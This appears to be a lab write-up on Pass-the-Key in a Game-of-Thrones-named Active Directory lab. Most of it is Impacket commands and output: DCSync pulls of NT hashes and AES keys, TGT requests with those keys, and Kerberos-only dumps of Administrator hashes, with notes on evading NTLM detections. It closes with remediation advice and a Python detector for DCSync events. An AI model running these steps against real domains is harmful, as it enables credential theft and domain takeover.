Overpass-the-Hash is commonly described as converting an NTLM hash into a Kerberos TGT. The more precise variant, Pass-the-Key, skips the NT hash entirely and authenticates directly with a Kerberos AES key. The result is a fully native Kerberos flow with no NTLM traffic, no RC4 downgrade, and no NTLM-based detection signatures.
AES keys live in NTDS.DIT alongside NT hashes. A DCSync pull with sufficient replication rights returns both. eddard.stark is a domain admin in north; daenerys.targaryen holds the same role in essos. Both credentials were recovered in earlier posts. The goal here is to use their AES keys, not their passwords or NT hashes, to obtain valid TGTs.
DCSync for eddard.stark:
```
impacket-secretsdump 'north.sevenkingdoms.local/eddard.stark:FightP3aceAndHonor!@winterfell.north.sevenkingdoms.local' \
    -just-dc-user eddard.stark

eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
[*] Kerberos keys grabbed
eddard.stark:aes256-cts-hmac-sha1-96:f6b4d01107eb34c0ecb5f07d804fa9959dce6643f8e4688df17623b847ec7fc4
```
And daenerys.targaryen from meereen:
```
impacket-secretsdump 'essos.local/daenerys.targaryen:BurnThemAll!@meereen.essos.local' \
    -just-dc-user daenerys.targaryen

daenerys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
[*] Kerberos keys grabbed
daenerys.targaryen:aes256-cts-hmac-sha1-96:cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378
```
Worth noting: AES keys are derived from the account password. Resetting a password regenerates them. If a key extracted from a prior session stops working, a fresh DCSync will produce the current key.
With the keys in hand, getTGT.py sends an AS-REQ with pre-authentication encrypted under the AES256 key. The KDC validates it and issues a TGT. No NT hash is used, no NTLM exchange occurs.
```
impacket-getTGT north.sevenkingdoms.local/eddard.stark \
    -aesKey f6b4d01107eb34c0ecb5f07d804fa9959dce6643f8e4688df17623b847ec7fc4
impacket-getTGT essos.local/daenerys.targaryen \
    -aesKey cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378

[*] Saving ticket in eddard.stark.ccache
[*] Saving ticket in daenerys.targaryen.ccache
```
describeTicket confirms etype 18 throughout:
```
impacket-describeTicket eddard.stark.ccache

[*] User Name : eddard.stark
[*] User Realm : NORTH.SEVENKINGDOMS.LOCAL
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
```
With KRB5CCNAME set, the ticket is used directly for any Kerberos capable tool. DCSync against winterfell with no password or hash on the command line:
```
KRB5CCNAME=eddard.stark.ccache impacket-secretsdump \
    -k -no-pass north.sevenkingdoms.local/eddard.stark@winterfell.north.sevenkingdoms.local \
    -just-dc-user north/administrator

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5f2d015f316018f6405522825689ffe:::
```
Same against meereen:
```
KRB5CCNAME=daenerys.targaryen.ccache impacket-secretsdump \
    -k -no-pass essos.local/daenerys.targaryen@meereen.essos.local \
    -just-dc-user essos/administrator

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5f2d015f316018f6405522825689ffe:::
```
Both DCSync operations complete over pure Kerberos. No NTLMSSP frames, no NetNTLM challenges, no etype 23 downgrade. The authentication is indistinguishable from an interactive logon from the KDC’s perspective. Detections built on NTLM event IDs, RC4 etype alerts, or NetNTLM relay indicators will not fire.
Remediation
The root capability is DCSync. Without replication rights, AES keys are unreachable through this path. Audit the accounts holding Replicating Directory Changes All on the domain object and remove that right from any non-DC principal. Enroll high-value accounts in Protected Users; members cannot authenticate with RC4 and their credentials are not cached on member servers. Credential Guard prevents Kerberos key extraction from LSASS on member machines but does not protect NTDS.DIT on domain controllers. Monitor event 4662 for access to the domain object with the replication GUIDs (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 and 1131f6ad), and baseline 4769 TGS requests for privileged accounts to detect service ticket requests from unexpected source hosts.
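The 4662 check above, written out as an added detection example (not code from the original post or from Impacket): it walks parsed 4662 records, keeps those where the AccessMask carries the control-access bit and the Properties field names a replication extended right, and reports any subject that is not a known DC computer account. The sample records and the set of DC accounts are constructed for the north domain of the lab and are assumptions.

```python
# Added example: flag 4662 records where a non-DC principal exercised a replication
# extended right on the directory (the DCSync footprint discussed in the post).
import re

# Documented Active Directory extended-right GUIDs for directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit of the 4662 AccessMask
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Assumed DC computer accounts for north; any other subject using replication rights is suspect.
KNOWN_DCS = {"WINTERFELL$", "CASTELBLACK$"}

# Constructed 4662 records, split into fields the way an EVTX parser or SIEM delivers them.
# %%7688 is the "Control Access" token that precedes the GUID list in the Properties field.
SAMPLE_4662 = [
    {"SubjectDomainName": "NORTH", "SubjectUserName": "WINTERFELL$", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},  # DC-to-DC replication
    {"SubjectDomainName": "NORTH", "SubjectUserName": "eddard.stark", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},  # user account pulling secrets
    {"SubjectDomainName": "NORTH", "SubjectUserName": "jon.snow", "AccessMask": "0x10",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},  # constructed non-replication access
]


def replication_rights_in(properties: str) -> list:
    """Return the replication rights named in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def is_dcsync_candidate(event: dict, known_dcs: set) -> bool:
    """True when a subject outside the DC set exercised a replication extended right."""
    if not int(event["AccessMask"], 16) & CONTROL_ACCESS:
        return False
    if not replication_rights_in(event["Properties"]):
        return False
    return event["SubjectUserName"].upper() not in known_dcs


def find_dcsync(events: list, known_dcs: set = KNOWN_DCS) -> list:
    """Return (DOMAIN\\user, [rights]) for each event that matches the DCSync pattern."""
    return [(f'{e["SubjectDomainName"]}\\{e["SubjectUserName"]}', replication_rights_in(e["Properties"]))
            for e in events if is_dcsync_candidate(e, known_dcs)]


if __name__ == "__main__":
    for who, rights in find_dcsync(SAMPLE_4662):
        print(f"DCSync indicator: {who} -> {', '.join(rights)}")
```

In production the known-DC set has to be maintained from the directory itself, and accounts that legitimately replicate (Entra Connect sync accounts, backup agents) need an explicit allowlist rather than a blanket exclusion of names ending in `$`.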